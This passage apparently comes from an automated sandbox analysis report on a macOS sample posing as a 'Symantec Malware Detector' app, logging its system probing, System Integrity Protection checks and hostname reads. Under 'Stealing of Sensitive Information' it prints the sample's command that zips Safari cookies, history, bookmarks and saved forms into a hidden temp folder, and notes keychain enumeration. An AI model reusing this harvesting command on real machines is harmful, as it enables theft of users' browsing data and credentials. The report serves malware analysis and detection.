Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: kern.safeboot (1.66)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: kern.safeboot (1.66)
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configurationShow sources
Source: /bin/sh (PID: 494)Csrutil executable: /usr/bin/csrutil -> csrutil status

Language, Device and Operating System Detection:

barindex
Reads the system or server version plist fileShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 504)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/sw_vers (PID: 552)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Queries OS software version with shell command 'sw_vers'Show sources
Source: /usr/bin/perl5.18 (PID: 552)sw_vers executed: /usr/bin/sw_vers -productVersion
Reads hardware related sysctl valuesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.availcpu (6.25)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.ncpu (6.3)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.cpu_freq (6.15)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version valueShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: kern.osversion (1.65)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: kern.osversion (1.65)
Reads the systems OS release and/or typeShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.ostype (1.1)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 513)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 516)Sysctl requested: kern.osrelease (1.2)
Reads the systems hostnameShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 478)Sysctl requested: kern.hostname (1.10)
Source: /sbin/route (PID: 479)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 481)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 482)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 483)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 484)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 486)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 488)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 489)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 493)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 494)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 495)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 495)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 496)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 498)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 500)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 501)Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 506)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 509)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 511)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 514)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 517)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 519)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 521)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 523)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 525)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 527)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 529)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 530)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 531)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 532)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 537)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 539)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 543)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 544)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 545)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 546)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 547)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 550)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 553)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 557)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 559)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 560)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 562)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 564)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 565)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 566)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 568)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 569)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 570)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 571)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 575)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 578)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 579)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 581)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 583)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 585)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 586)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 587)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 591)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 592)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 593)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

barindex
Archives Safari's bookmarks and may steal themShow sources
Source: /bin/sh (PID: 485)Zips Safari's bookmarks : /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's cookies and may steal themShow sources
Source: /bin/sh (PID: 485)Zips Safari's cookies: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's history database and may steal itShow sources
Source: /bin/sh (PID: 485)Zips Safari's history DB: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's saved forms and may steal themShow sources
Source: /bin/sh (PID: 485)Zips Safari's saved forms: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
May steal keychain information which contains credentialsShow sources
Source: /usr/bin/zip (PID: 487)Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 487)Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Screenshot